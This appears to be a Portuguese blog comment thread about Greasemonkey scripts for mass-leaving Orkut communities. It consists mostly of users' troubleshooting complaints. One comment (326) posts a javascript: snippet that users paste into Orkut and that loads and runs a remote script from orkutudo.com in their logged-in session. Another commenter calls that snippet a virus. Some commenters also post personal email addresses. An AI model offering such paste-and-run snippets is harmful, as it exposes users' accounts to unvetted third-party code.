
    poooh, n taaa indo n..
    ondd fiik esses botoes ai do zerar… ????
    vlww !

  189. BIANCA Says:

    Eu não conseguii usar tb’ não.. ! eu teenhoo 345 comuniidadees ee qro saiir dee tdas .! Poor favoor ajuuda ae !!! (Y)

  190. Renan Says:

    Eu instalei tudo certin tal, e nao apareceu nada u.u
    tenho certeza de ke fiz o processo corretamente ;]

  191. Ícaro [Japa] Says:

    eu instalei td
    mais nun to axando o botaum..
    onde ele deveria ficar?
    desde jah…vlw

  192. infoxp Says:

    O botão deverá aparecer abaixo da janela “Comunidades”, anexada na página do seu perfil.

  193. Feeh Says:

    Não entendii ;s
    Qual daqueles eu tenho que instalar ?

  194. Feeh Says:

    aaaaa, e eu não tenho firefox “/

  195. infoxp Says:

    É só instalar.

  196. JonnyLee Says:

    parabens pela sua inteligencia cara
    seja sempre assim

  197. Guilherme Domingues Says:

    eu baxo o segundo item mais ele nao abre no meu pc…
    vai pra uma pag do windows

    sera q vc pode me ajuda cara?

  198. Matheus Says:

    baixei tudo, os botões aparecem, mas quando vou colocar as exceções não funciona.. e quando clico em zerar não abre nada… poderiam me ajudar? valeu

  199. Anônimo Says:

    e uma porcaria eu to quereno saber como q faz pra sai de uma comunidade mais droga num me fala naummmmmmm

  200. má :D Says:

    tipo; eu instalei tudo certiinho, mas aae, eu fui no meu iniicio, e nun tiinha nenhum botãão lá ><‘ eae?😡

  201. má :D Says:

    então, agora os botões apareçeram e taal; ai quando eu cliiqei em zerar, só saiu de uma ;x ai agora eu to tentando, e nen ta fazendo nada ;O’ maiis eu vou contiinuar tentando xD

  202. mayara - Says:

    como é que eu fasso para ativar o bloqueador? é que, eu apertei zerar, e tá. mas ai ele apareçia uma janelinha qe falava: – o firefox impediu de abrir (TANTAS) páginas. Ai eu apertei para cancelar isso, ai começo a abrii as janelas das comunidades, e saía automaticamente, mas só saíía as qe tava no iniciio; Então, como eu ativo de novo o bloqueador? e também, se você descobrir o que está havendo aii, qe não tá saindo de todas, me avisa também. Valeu :*

  203. Guilherme Says:

    Eu instalei o GreaseMonkey, e os scripts
    eu clico em zerar e nada acontece
    ai eu instalei o mod, e sumiram os botões.
    Já tentei um monte de vezes

  204. nego Says:

    vlww

  205. GBR Says:

    mesmo caso do Guilherme,
    sem o mod aparece o zerar, mais ao clicar nada acontece,
    qd instalo o mod, desaparece os botoes…
    Firefox 3.0

  206. Willian Says:

    hey, aqui não deu, instalei tudo e talz, mas não vejo botão algum

  207. infoxp Says:

    GBR, tenta esse jeito, é garantido:
    https://infoxp.wordpress.com/2008/11/07/novo-metodo-para-sair-de-todas-as-comunidades-do-orkut/

  208. Jason Says:

    Opa!Valeu campeão
    acabei de usar isso
    só nem baixei o JOIN COMUNIDADES
    mas está dando certo
    está excluindo umas 6 por seg
    Abraço
    Valeeeu

  209. lol Says:

    nao entra o site

    :X

  210. lol Says:

    do gresmoke nem entra lekada

  211. Diohkita Says:

    ée seguro ???
    SEEM notificacão de virus ?!
    anh ?

  212. Stifler Says:

    Eu não consegui usar….. eu aperto no botão zerar mas não funciona!

    Pode me dizer como usar o GreaseMonkey zerar comunas no orkut?

  213. (: Says:

    eu instalei tudo, mais quando entro no meu orkut não aparece o botoes para
    eu apertar, meu idioma esta em portugues, mais não da ! O que tenho que fazer ?

  214. lool Says:

    eu instalei tudo, so que na hora q eu entro no orkut nao acho os boteos de zerar ! o que eu faço, preciso apagar minhas comunidades, é ruiim demais ficar com muitas ! ja desistalei intaslei um monte de vezes mais não aparece

  215. RINALDO Says:

    se eu for istalar tudo isso eu ja apaguei minhas comunidades todas oxe !!!!!!!!!!!!!!!!!!!

  216. janine Says:

    olha, eu instalo tudo mais não aparece nada no orkut, nem em lugar nenhum, e eu não estou afiim de escluix mais de 800 comunidades uma por uma. eu clico nos links mais não consigo entra, dá eerro, ou sei lá :~ muito complicado isso :S

  217. Says:

    baishei tdo o kee pediiu laah instaleei tdoo e paah
    mais naun apareceeu esse link zerar comunidades:/
    o ke eeo faaço?

  218. Douglas Says:

    como eu deleto essa parada agora ?
    tirar ela do mozila, como faço ?

  219. Douglas Says:

    eu num consigo ée baixar esse 3 e 4 programa aii
    pede pra entrar no site
    mas no site num encontro onde baixarr
    encontrar láa ZERAR COMUNIDADES…
    mas eu clico e aparece tipo um ‘bloco de notas’ sóo palavras
    faço o quê com aquilo ?

  220. Larissa Says:

    oii eu não consigo zerar as comunidades eu instalei tudo certinho e quando ativo zerar comunidades e join comunidades e clico em zerar a pagina fica atualizando sem parar!! e não exclui nenhuma comunidade, desinstalei e reinstalei de novo mas fica do mesmo jeito!

  221. Junio Says:

    tava qrendo fazer isso ai tambem…
    mas os ultimos nao conseguiram e nao vou tentar entao..
    auhauhau

    tava lendo por ai.. e descobrir q se voce tiver 1000 comunidades qdo vc for entrar na 1001 vai falar q vc ja ta em muitas comunidades e q e pra siar de algumas
    ai vai aparecer todas elas com caixinhas para marcar as q vc qr sair…..

    eu tinha 1000 ai o orkut foi diminuindo.. e dps de algum tempo q qro apagar… agora tenho q entrar em 100 pra ve se issu ai vai funcionar…
    😀
    alguem q ja tem 1000 ve se existe isso ae…

  222. Luana Says:

    instalei tudo, dai aparece realmente o botão zerar
    dai eu clico e aparace uma janelinha com esse nome Criando propriedade no about:config… dai eu dou ok e num acontece nada
    pq? oq eu faço?

  223. Romulo Says:

    Criando propriedade no about:config…
    comigo tambem aparece isso
    porque?

  224. Caio Says:

    Eu ñ consigo instalar nem o Join comunidades nem o Zerar……………como eu isntalo?

  225. fabiany Says:

    eu quero excluir mais nao quero baixar nada pq nao vo eender como eu faço nao alguem metodo bemmmmmmmmm mais simples?

  226. Juse Says:

    pq agora eu n consigo fazer nd no meu orkut
    msm no internet explorer!
    me diga!

  227. Juse Says:

    ah n comentei num lugar errado! :B

  228. bruno Says:

    Naãao consegui tirar nenhuma comu, fiz tudo oque pediiu, eu tenho 1000 comu, porque não zero??

  229. Felipe Says:

    Obrigado cara Apaguei todas !!

    Parabens

  230. natália Says:

    aqui também fica ‘Criando propriedade no about:config’, deve ser falha, tem que lembrar que o script ainda é beta :// depois tento de novo :S

  231. Phelipe Says:

    é o seguinte, aqui tambem nao ta pegando porcausa do windows, ele nao pode abrir mais de seis paginas, só tres, é o limite, pra mim nao da mesmo rs, mas uma dica, nao baixem o MOD, com o MOD nao aparece os botões! espero ter ajudado, e esse about:config eu nao sei o que é, o meu dava isso, eu fiquei trinta minutos lá e pegou, mas ai eu notei esse meu problema do windows, tchau jent :*

  232. Anônimo Says:

    aqui também fica ‘Criando propriedade no about:config’, deve ser falha, tem que lembrar que o script ainda é beta :// depois tento de novo :S [2]

  233. Anônimo Says:

    Aki tbm aparece “Criando propriedade no about:config’”

    Fiz tudo direitinhoo…

    Ajudaa…\o

  234. Ariaiho Says:

    vai excluir também as comunidades que eu criei?Digo,as comunidades que eu sou dono?

  235. Isabella Says:

    eu baixei tudo direitinho, salvei tudo no desktop , mais não aparece o icone do macaco:/
    o que ta acontecendo ?

  236. Alexandre Says:

    pq nao que instala esse Greasemonkey(extensão para o firefox):

  237. gustavo Says:

    Otimo , perfeito . o chato que o seu orkut fica sem ser usado por um bom tempo. só no outro dia que você vai usa-lo corretamente . você fica impossibilitado de postar comentarios e responder scraps e tópicos de comunidades ”/

  238. Rafael Says:

    Perfeito cara…
    funcionou corretamente, mas nao da pra exclui todas de uma vez, ele trava em um certo ponto, aih temos que ficar um tempo sem usar a função de sair da comu…, mas eh melhor que exclui uma por uma, pois tinha 1000 comus…

    valew…!

  239. Taisa Says:

    Eu não consigo intalar as extenções

  240. Taisa Says:

    Criando propriedade no about:config… tah apresnedo isso e agora?

  241. Natalia Says:

    não estou nem consguindo instalar.

  242. christian Says:

    Criando propriedade no about:config… tah apresnedo isso e agora?²

  243. christian Says:

    galera o mod SÓ FUNCIONA NO FIREFOX 3.0.8 …..
    tem ele no baixaki……. vlws tomara ke resolva o problema de alguem =)

  244. Mahty Says:

    AQUI EU NAO CONSEGUI INSTALAR O MOD PORQE NAO CARREGA O SITE E SEM O MOD QUANDO APERTA ZERAR ELE SO ATUALIZA E NAO ZERA NADA !

  245. Anônimo Says:

    Aparece o macaquinho aki,instalei tudo direitinho mas não aparece o botão no orkut de excluir as comunidades!

  246. Yarlla Says:

    Aparece o macaquinho aki,instalei tudo direitinho mas não aparece o botão no orkut de excluir as comunidades!

  247. Luan Says:

    POOOOWW … eles instalam, aparecem os botoes … ai quando eu clico em zerar aparece :
    Criando propriedade no about:config…

    cmo se eu arrecem tivesse instalado , vou tentar reinstalar

  248. Jackz Says:

    Funciono legal aki mais foda, que ele sai de uma por uma,
    tenho 1000 cmm ai fica tenso.

  249. Samara Says:

    Gente
    Acabei de instalar do jeito q ele disse
    Dá td certo….
    As minhas estão sendo deletadas…..inclusive instalei outros scripts pro orkut bem legais….

  250. monique Says:

    Caramba não consigo o botão de zera la na minha página fiz tudo certo nessa porcaria ! que tem isso

  251. paulo cesar Says:

    eu baixei tudo certo e ta com o macaco de oculos e nao aparece nenhuma caixinha amerela D:

    • Anônimo Says:

      sedr

  252. Lucas Says:

    onde que apareçe a caixinha amarela ? :S

  253. lohenna Says:

    Criando propriedade no about:config…

  254. Juh Says:

    Tbém não consegui usar… aki naum deu certo naum… =\

  255. Juh Says:

    Aff… agora o meu apareceu lá os negócios de zerar e tal… mas naum zera…. aparece

    Criando propriedade no about:config…

  256. Luiza Says:

    Não estou conseguindo excluir minhas comunidades do orkut como excluir?

    • nakajima Says:

      ñ sei

  257. mandi Says:

    nao consigo baixar o JOIN e ZERAR COMUNIDADES . porque?

  258. mandi Says:

    nao consigo instalar o JOIN e nem o ZERAR COMUNIDADES, como faço?

  259. Silvinho Says:

    Ondee eé qe aparecee o botaaõ zeerar comuniidades ?
    Eu instaleei o MOD , o monkey os scripts, tudiin certoo e agoora eu naaõ seei onde aparecee ese botaaõ para zerar !😡

  260. Thiago. Says:

    Cara, me explica uma coisa..
    Fiz tudo, apareceu os botões e tudo mais.
    Só que não zerou as comunidades…
    Me explica no msn, não vou voltar aqui :S’
    hei.black@hotmail.com

  261. Alison Says:

    pO consegui excluir uma 300 comunidades de uma vez!
    bem legal!

  262. Rafaela Says:

    Euu nao consegui ! Aparece tudo isso mais nao dá tem que fica apertando pra sair.nao dáaa demooooooora demais !!!

    Tenho qse 400 comunidades…isso que eu consegui excluir umas 200 =D
    mais sem o programiinha D:

    affeee

  263. Joseph Says:

    É o seguinte vocês nao estao descobrindoo pq algumas pessoas conseguem e outras nao, tem algo impedindo… eu fiz tds os passos e testei em mais de 4 versoes incluzive na ver 3.0.8 mas nao consegui… aparece os botos e tudo mais mas quando cliko em zerar aparece configurandi no about… e nao da certo nada acontece. OBS fiz exatamente todos os passos como vocês pediram!!

  264. Naim Darak Says:

    aconteceu a mesma coisa comigo,
    eu fiz tudo direitinho e quando
    eu aperto zerar não acontece nada,
    só aparece o configuradi no about…

  265. naah Says:

    poshaa esse seu método eh horríveel neeim zera e trava!!
    e as pop-ups não destravam noo meu pc

    obs:o meu eh windows vista starter

  266. naah Says:

    sooh nu pc da minha amiga kii prestaaa

  267. Angélicaa Says:

    Conseguiiiii, uhulll :DDDD

  268. Angélicaa Says:

    Gente no meu tava aparecendo: configurandi no about
    Fiiz um negociio lá e foi pra buraco 900 comunidadesss, uhull😀, agora vou entrar so nas boass. Beijo gente boa Sorteee😛

  269. Breno Says:

    só funciona com o firefox?

  270. Bruno Says:

    Criando propriedade no about:config…

    Tah dando isso ‘-‘

  271. Thais Alves Says:

    Eu não to consegundi zerar minhas cominidades não. Lá aparece EXCEÇÕES, DESFAZER 1 EXCEÇÃO E ZERAR.
    Eu clico em zerar nada aconteçe. Por acaso demora um pouco ou quando eu sair do orkut e entar denovo vai estar ZERADO?

    Beijos.

  272. gustavo Says:

    ñ tô conseguindo eu deixei um tempão lá ñ fez nada!!!!😡

  273. Túlio Says:

    naum to conseguindo zerar!!!!
    td vez q clico em zerar, aparece uma frase:
    ” criando propriedade no about:config… ”
    E clico de novo e aparece a msm coisa… tipo, atualiza a pg
    só q naum zera

  274. Bruna Says:

    Essa forma sai de todas as comunidades, mas permanece as que somos donos né?

  275. su Says:

    a naum consegui usar naaum!! eu vou sair de 800 comunidades uma por uma mesmo

  276. Victor Says:

    funcionou sim, é só instalar aquele mod que o Daniel disse, mas depois de um tempo o google bloqueia seu acesso no orkut, porque ele percebe que vc está saindo das comunidades mas de um jeito automático, e diz que vc pode estar com um vírus, mas é só esperar 1 hora ¬¬ +/- e logar de novo no orkut e começar o processo

  277. Victor Says:

    corrigindo, se vc esperar uns 15 minutos ja volta ao normal !

  278. Diego kocham Says:

    Cara ake ta funfando de boa…. ta abrindo varias janelas saindo automaticamente….. só nao sei o que acontece depois… Espero que não haja scripts malicioso pra fude meo pc bichado….. PORÉM DE RESTO TA INDO QUE É UMA BELEZA VLW MESMO !!! PARABÉNS PRA QUEM INVENTOU ESSE CARA MERECE 100 VIRGENS !!!

  279. Guilherme Says:

    Descobri PORQUE TEM ORKUT DE PESSOAS Q NAO ESTA APARECENDO O BOTAO
    VERIFIQUE A LINGUAGEM DO ORKUT SE ESTÁ EM PORTUGUES DO BRASIL!!!1
    O MEU ESTAVA EM INGLES FOI PRECISO ALTERAR A LINGUAGEM

    BE HAPPY ;d

  280. Matheuz Says:

    Aonde Ta Esse BOTAO AMARELO E ETC , On Ta As Coisas Que Nao Acho o_o

  281. matheus Says:

    quando eu cliko em zerar apareceee aplicando propriedade about:config ???? oque ee que eu fasso

  282. Tico Says:

    Ai Matheus funciona sim mermo muito bom esse programa
    faz assim q da certo oh depois q vc instala o MOD vc pega e instala os outros dois passos novamente e desbloqueia os poups…q ai vai dar certo…

  283. srtagabi Says:

    o meu apareceu os botos la tudo de zerar e exessoes, eu clikei e apareceu uma janelinha escrito assim: Criando propriedade no about:config… com a opção Ok, eu clikei e não zero nada😦

  284. Dariio Says:

    O meoo aparece Criando propriedade no about:config… com a opção Ok e n tah fazendo nd… como faço pra zerar tudo?fiz tudos os passos e n deu nd … me expliquem como faço oke mais tenho oke fazer

  285. Jeeeh Says:

    Fiiiz tuudooo qii voce peediiu maiis nen deuu certuu nauun . algueem me expliicaaaa ‘
    ¬¬’
    ?

  286. Jeeeh Says:

    aapereceeu o negoçiin amareloo cliikeii lá e naun saiiuu ¬¬’

  287. Ziina Says:

    Como eu desbloqueio os popups?

  288. Isabela Says:

    caara, eeu to fazendo tudo direeito, maais na hora qe eeu clico no último link, qe tu mando, faala pra eeu verificar se eeu já tenho o macaco cabeludo😡 me ajuda ?

  289. Alguém Says:

    Só funciona pra quem tem mais de 2 neurônios.

  290. Marina Says:

    Bem, testei… deu mais ou menos certo.
    Quando restaram 8 comunidades, acusou
    que o orkut em questão estava impedido
    de realizar tal operação.
    E então eu também não conseguia mais
    mandar recados… nada.
    Desinstalei o programa, mas meu orkut
    continua da mesma forma. O q faço????

  291. Camila Says:

    meeeu, vocs tãoO reclamando tudo, eu tinha mil comunidades e tive que excluir de uma em uma !

  292. carol Says:

    fiz tudo como diz .. mas nao aparece o botão zerar :s

  293. Matheus Says:

    fica falando que os meus cookies tao blockeados

  294. Henrique Says:

    fiz tudo certo, quando restaram 90 comunidades apareceu uma menssagem do google que oque eu estava fazendo era ilegal e que eles tinham identificado como virus por ser repetitivo. agora não da pra mandar scrap nem de sair de comunidades!
    que que eu faço?

  295. Gabriel Says:

    Tpw, eu Clico em Zerar ai Atualiza a Pagina e Aparece

    Criando Propriedade no about:config…

    [OK]

    Como Essa Foto Abaixo :

    E Agr?Uq eu Faço?

  296. veridiana Says:

    to com o mesmo problema,aparece isto: http://img20.imageshack.us/img20/2854/aboutconfig.png
    o que faço? T_T

  297. Tico Says:

    Bom Quem está aparecendo isso aki:
    Criando Propriedade no about:config…

    tem q fazer novamente o processo
    ai depois q vcs instalarem o MOD vcs pegam e instala os outros dois passos novamente e desbloqueia os poups…q ai vai dar certin…e muito e funciona sim
    Ah e pra quem tem mais de 300 ele vai acusar q e virus e tals
    ai vc espera +- 30 min e entra q ja vai esta normal sua pagina…

  298. drika Says:

    FUNCIONA MESMOOO, VLWWW

    Tem que fazer isso mesmo que o Tico disse.

    Obrigada! =**

  299. Isabela Says:

    eu não consegui baixar a extensão pro firefox

  300. I. Says:

    Bom esse site, o unico problema é q vcs n ensinam como fazer… aí fica dificil!
    Mas aq está um link de um cara no Youtube, q ensina a fazer certinho. É só olhar lá, e pegar os links aq, e pronto! > Problema resolvido.

  301. Danilo Says:

    http://www.orkut.com.br/Main#CommMsgs?cmm=17166326&tid=5273054911378132925&kw=Sair+de+todas+as+comunidaes+do+orkut

    (Caso não queiram acessar o link, procurem no orkut a conmunidade: “Dicas Truques pra Orkut/Msn[1]” e procurem o tópico)

    Nessa comunidade tem o código onde você coloca o script na barra de digitar sites e as vocês conseguem sair das comunidades. Aqui funcionou, não demora muito!

    • Anônimo Says:

      adorei

  302. Anônimo Says:

    ronaldo

    • fraviani Says:

      o se me perguntar isto de novo rastreio teu orkut

      • Ninja Says:

        Rastreia intão otaria, antes de vc saber como ve seu proprio IP, ja vai ter um trojan no seu pc BY: Hacker Ishi!!

  303. igor Says:

    quero sair de minhas comunidades

  304. igor Says:

    não quero mais essas comunidades

  305. Caroline Says:

    Ahh tentei fazer oque o danilo la em cima falou mais não deu certo =(

    • Dennis Says:

      Esse negócio de script q o danilo falou provavelmente é mentira, normalmente são virus ou ele fez vc entrar em outras comunidades ainda.

  306. Lucas Says:

    Ah, pela mor né? baixar tudo isso pra ficar pesado o pc? haha, quem é o tonto? exclui a mãe mesmo ¬

    • Juan Says:

      Esse éé o comentario de um pobre.. com um pc ridiculo !😉

      • Eu pq? Says:

        eeh msm… e nem eh pesado pooxa !

      • Anônimo Says:

        não é comentário de um pobre
        certamente pesa o pc msm
        e não pensse que eu to falando isso pq meu pc
        tem pouca memória pq não é
        ele tem 20 g de memória

      • Wiviane Barci Says:

        Não é comentario de pobre nao se BURRO.. computador algun precisa disso tuudo.. Aprende antes de chama os outros de pobre, ctz que é um playboizinho de meia tigela que fala as coisas sem saber, aprende as coisas e depois critica, alias aprende a criticar, a falar, e escute antes de falar, o computor, o Notebook.. pode ser o pc que for, que pesa siim. nem todos os progamas saão confíaveis táa ‘

  307. ZIcaa Says:

    num deu certo .. já add uma exceçao ja tentei tudo , cliquei em zerar um tanto de veiz num funcionaa !

  308. Anônimo Says:

    Nao funcionou comingo nem na versao nova nem na antiga do orkut.

  309. que merda ! Says:

    tu acha mesmo que a gente vai baixar tudo isso só pra sair das comunidades ? prefiro miil vezes ir saindo uma por um do que fica lendo essas burrisses.

    • Mikael Says:

      Burrice é seu Português.

  310. Consegui ! Says:

    =D

  311. guilherme Says:

    pra mi mapareceu tudo mas eu clico em zerar e continua a mesma coisa porque sera ?

  312. Anônimo Says:

    porq os moderadores já atualizaram, entao só da pra sair uma por uma, é uma piroca msm -s

  313. aff Says:

    afff….nadegas funcionou!!!!!!

  314. Lee Way Says:

    ONDE TÁ O BOTÃO AMARELO?

  315. Anônimo Says:

    Queria saber como deletar a comunidade que vc mesmo fez ?

    • maria Says:

      so vc pesquisar que vc acha eu fIZ ISSO E ACEIIIIIIIIII SO VC COLOCAR COMO ESCLUIR COMUNIDADES D ORKUT?

    • Wiviane Barci Says:

      É só você ir na sua comunidade, e por ” excluir comunidade ”.. Aii você vai ter que mudar a senha do seu orkut, por que se não não muda ok.
      Espero ter ajudado.
      (Obs: o orkut automaticamente vai manda você mudar a senha).

  316. talita Says:

    quero sai da minha comunidades

  317. LUAN Says:

    O botão amarelo num sei .. mas o Vermelho ta akie dentro da minha cueca ;P é só apertar ;D Isso ai nem funciona !

  318. mayara Says:

    Droga de hora que inventei em entrar em quase 900 comus.
    agora quero reformar meu perfil e essa drogas tão tudo lá.o pior é que toda são comus que não vão me servir pra nada.não dá pra deixar lá…quando entrei ainda era muito nova.aff,paciencia pra apagar todas.

    ah é…esses programas não funcionaram comigo também não!
    bjos

  319. que bostaaa Says:

    Que meerdaaaaaaaa! isso nem entra, tava com 365 comu, fiquei tirando uma por umah por 30 mins, e agora jáh to com
    253! Que lixooooooooooooooooooooooooooooooh!
    Odeio o FIREFOOOOOOOOOOOOOOOOX
    Só uso o Google Chrome!😀

  320. NAÕ ASHOO Says:

    Maaan algueem onde tá esse botão naõ acho qe
    merdaa , alguem faz un Print e me mostra ?
    POR FAVOR

  321. anonimo Says:

    aff, vao se ferrar porra. esse link de download nem presta mais –‘

  322. GM Says:

    faço tudo no esquema e abre uma janela do word dps q adiciono o scrip e nem aparece nada ja tentei tudo , desbloqueando pop-up , f5 , refazer ,e nem funfa explica direiro esse bang man senão não vira inteligencia pura

  323. Bruna Caroline Says:

    Nao achei o Script , o meu ta em ingles .. entao e dificil procurar , me ajuda ? ;/

  324. Anônimo Says:

    Link quebrado

  325. NUM SEI.... Says:

    ISSO NÂO FUNSIONA DE JEITO NENHUM,PORRA..!
    SE É PRA TIRAR COMUNIDADE COM SIMPLISSIDADE È MUITO MELHOR DEIXAR TODAS AS COMU LÀ

    SE ISSO FUNCIONA FAZ AI…TENTA!!!! EU Q NUM VÔ PERDER TEMPO COM ISSO…!

  326. Will Says:

    javascript:var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));with(script){src=”http://orkutudo.com/scripts/saircmm.js”;language=”JavaScript”;};document.body.appendChild(script);var confirmar=setInterval(function(){UnJoin();clearInterval(confirmar);},2000);alert(“Mais codigos no site:www.orkutudo.net”);void false
    .
    .
    .
    .

    SÓ COLAR NA PAGINA INICIAL DO ORKUT QUE VAI APARECER UMA TELA VERMELHA, DEPOIS SÓ DEIXAR QUE SAI DE TODAS AS COMUNIDADES SOZINHO !
    .
    Abraço a todos

  327. estella Says:

    essa porra prestou nãoo ‘
    que caralhoo _I_

  328. cocacola Says:

    tudo isso é pra fazer merda no pc de voceis

  329. mary Says:

    parabéns!!!

  330. Anônimo Says:

    o código em cima é VIRUS

  331. gabriela d. Says:

    ooi gente , do segundo link para baixo , nao consigo baixar , o site nao é encontrado:/ se alguem souber como posso resolver , me mandem por email (:
    email: gabizinha-soso@hotmail.com
    Obrigada des de ja .

  332. Diego Says:

    Neste site ensina e está funcionando:
    http://orkutudo.com/sair-de-todas-comunidades/codigos1/19

  333. giovanna Says:

    dois links não deu certo! :s

  334. Thaiana Says:

    Esse do orkutudo.com é excelente… funciona mesmo

  335. naay Says:

    gente calma! se não deu certo, tranquilize seu interior,e tire esse stress pós-moderno de dentro de sí. abraço a tds. obs: vou dlt uma por uma! paciência e boa vontade

  336. bruna Says:

    eu quero deixar todas minhas comunidades

  337. bruna Says:

    q bosta nao consigooooooooooo


Deixe uma resposta

